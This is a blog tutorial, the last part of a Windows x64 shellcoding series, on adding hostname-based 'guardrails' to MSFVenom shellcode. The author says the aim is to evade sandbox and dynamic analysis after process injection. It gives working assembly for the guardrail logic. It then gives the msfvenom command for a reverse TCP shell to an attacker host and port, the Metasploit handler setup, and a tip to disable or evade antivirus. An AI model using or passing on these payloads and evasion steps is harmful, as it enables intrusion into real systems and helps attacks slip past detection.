Windows x64 Shellcoding – Part 3

The third and final part of a three part series on Windows x64 Shellcoding. Going from a basic Hello World program in Assembly to implementing guardrails in MSFVenom shellcode.

Part 1 – Assembly and WinAPIs – Hello World
Part 2 – Assembly to Shellcode – Stack Buffers and WinAPIs
Part 3 – Adding extra functionality to MSFVenom

Most shellcoding tutorials show really interesting techniques, but don’t show anything practical. So I wanted to end this series but using the material to implement something interesting. We’re going to implement our own custom guard rails into MSFVenom shellcode.

In my experience, traditional payload development often uses the following pattern of behavior (I’m using Shellcode here in the traditional meaning, i.e. code that results in a shell, rather than just machine code).

Guard rails
Process injection
Shellcode

What if we used our knowledge of Assembly to flip this behavior, so we would end up with the following.

Process injection
Guard rails
Shellcode

This is purely speculative, but I suspect that this may be slightly more evasive than the traditional approach. My reasoning for this, is that process injection is a distinctive section of a payload that analysts may expect to be followed by explosive and malicious behavior. So if we were to add guard rails at the beginning of the shellcode, but after the process injection occurs, then this may add an extra layer of defense for sandbox and dynamic analysis.

My initial idea for implementing this was to have two pieces of shellcode. A custom piece of shellcode that implements guardrails, and a second piece of shellcode created by MSFVenom. We could then combine these together as follows:

guardrails = "\x48\x83\xec..."
msfvenom = "\xfc\x48\x83..."
shellcode = guardrails + msfvenom

We’ve already used GetComputerNameA, so let’s use the hostname of the computer as the guardrails for the shellcode.

Attempt 1 – Conditional Jumps

So my first idea for this was to use conditional jumps, using labels code to define sections that the execution flow could jump to depending on comparison of the output of GetComputerNameA.

    cmp    r13b, byte [r14+1]
    je     branch2

branch1:
    ; guardrails failed, do something and exit

branch2:
    ; guardrails succeeded, execute msf

The problem with this is that label, e.g. branch1 and branch2 are compiled into specific memory addresses, so this won’t work when injecting the shellcode into a new process. Another problem is we can’t use je and similar because it requires labels, so I am only able to use jmp.

Attempt 2 – Calculated Jumps

I didn’t really know what to call this, so I just called it a calculated jump. So if write our code as if it had labels, but we moved the labels the resulting code may look something like this

guardrails -> jump instruction -> branch1 -> branch2

My idea for calculated jumps is to figure out the distance from the jump instruction address to branch1 and branch1 to branch2. Let’s say that the distance from the jump to branch1 was 10 bytes, and the distance from branch1 to branch2 was 20 bytes, then if we can get the value of the Zero Flag, we can dynamically create the correct offset to the correct branch.

jmp_instr_addr + distance_to_b1 + (zf * distance_to_b2)

So if the Zero Flag is 0 or 1, depending on the output of the Guard Rails, our offset from our jump instruction address will either lead us into branch1 or branch2.

As an extra measure you can also add NOP sleds between each area, personally I did this as it just helps in-case you end up off by 1, you can then jump into the NOP sled. Also you can align the jump offsets to multiples of 16 (not sure if this is important, stack alignment issues just fucked me up too much).

cmp    r13b, byte [r14+1] ; compare bytes
sete   al ; set al to zero flag
movzx  rax, al ; zero extend al
mov    rcx, 16 ; amount to jmp to branch1
mov    rbx, 160
imul   rbx, rax ; 0 or 1 multiplied by 160, so either 0 or 160
add    rcx, rbx ; rcx is now 16 (16+0) or 176 (16+160)
mov    rbx, $ ; get current assembly position
add    rbx, rcx ; add jump offset

jmp    rcx ; do conditional jump with single jmp
; push rcx && ret also worked

I was able to get this logic working when compiling as an executable, but when using as shellcode it didn’t work. Still not sure why, if you know or have any solutions please let me know. I suspect it’s something about the current assembly position when calculating in shellcode.

Attempt 3 – Run or Die

So finally I accepted that I couldn’t get conditional jumps working so I started thinking about other solutions. 0 in ASM can be considered as two possible data types, a NULL value, or a 0 integer value. If we return to our MessageBoxA example and look at the third argument in rcx, it expects a string to display in the message box title, or alternatively a NULL value. This means if we use a 0 or 1 in this argument, our code will either succeed or crash. So continuing from our progress in part 2, let’s get the guard rails working.

So we can implement our guardrails after our GetComputerNameA call and before our MessageBoxA call. I’m using r15, r13 and rax here just because of the context of the surrounding code, and I don’t have to save anything onto the stack because the values are reassigned before they are used again.

xor    r15, r15 ; used for global boolean guardrail check
xor    r13, r13 ; used for storing chars to compare to hostname
xor    rax, rax ; use as a per-char guardrail check
mov    r15, 1 ; set boolean for guardrail

So first I cleared the registers just in case a random higher-order bit causes problems. But we’re going to iterate over our hostname stored in our stack buffer one char at a time, which in my example is JWIN11. So we need to repeat the following code six times and modify for each character.

mov    r13b, 0x4a ; J
cmp    r13b, byte [r14+0] ; compare first byte
sete   al ; set ZF, 1 if comparison was equal
movzx  rax, al ; zero extend
and    r15, rax ; not efficient

So if all of our checks passed, r15 should not contain 1, otherwise 0. We store it into r13 as the code used from Nytro’s blog will place the base address of the DLL into r15. However, we need 0 in r13 if we wish to execute successfully, so we xor the value to invert it.

mov   r13, r15
xor   r13, 1

After using the method described in Nytro’s blog, we can get a pointer to User32.dll, then call GetProcAddress with MessageBoxA. Now we should have the address of MessageBoxA in r15.

mov   rcx, 0
mov   rdx, r14 ; our stack buffer from part 2
mov   r8, r13
mov   r9, 0
call  r15

Now if we compile and extract the shellcode as we did in part 2, up until our latest MessageBoxA call, and append msfvenom shellcode after it, our guardrails should now act as an extra method of defense before our final shellcode executes. I’m going to use an x64 reverse shell from MSFVenom. Note that you will need to disable defender or encrypt the shellcode to bypass AV.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=172.19.180.219 LPORT=4444 -f c

Then setup the handler in Metasploit.

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST=172.19.180.219
msf6 exploit(multi/handler) > run

Then execute the final EXE containing your guardrails and msfvenom shellcode. If your guardrails don’t match your hostname, the EXE should just silently crash. If the hostname matches, you should see a message box appear, after selecting OK, the reverse shell should execute, followed by satisfaction.

If you’ve got this far, the best thing you can do is rewrite this to do something else. Following a tutorial is easy, implementing something new requires effort. My intention for this series was to provide an easy introduction, covering a lot of things that required extra research and weren’t covered by other tutorials, and to finish it by implementing something interesting so people can see a cool use case for learning how to do this stuff by hand.

If you learnt something cool and helped you with something, send me BTC for beer 🙂

bc1qannme72ya2gechk2ued2f96ec6v2veyctvz7mc

Windows x64 Shellcoding – Part 3

Share this: